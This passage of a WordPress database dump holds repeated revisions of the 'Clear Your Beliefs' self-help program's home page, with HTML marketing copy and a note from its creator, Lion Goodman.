beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 21:24:35', '2014-11-13 02:24:35', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1731, 2, '2014-11-12 21:44:59', '2014-11-13 02:44:59', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top: 25px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 21:44:59', '2014-11-13 02:44:59', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1737, 2, '2014-11-13 01:43:07', '2014-11-13 06:43:07', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-13 01:43:07', '2014-11-13 06:43:07', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1733, 2, '2014-11-12 21:57:33', '2014-11-13 02:57:33', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 25px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -20px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center;margin-top: 18px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 21:57:33', '2014-11-13 02:57:33', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1734, 2, '2014-11-12 23:16:07', '2014-11-13 04:16:07', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 23:16:07', '2014-11-13 04:16:07', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1735, 2, '2014-11-12 23:19:08', '2014-11-13 04:19:08', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -20px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 23:19:08', '2014-11-13 04:19:08', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1736, 2, '2014-11-12 23:33:31', '2014-11-13 04:33:31', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What 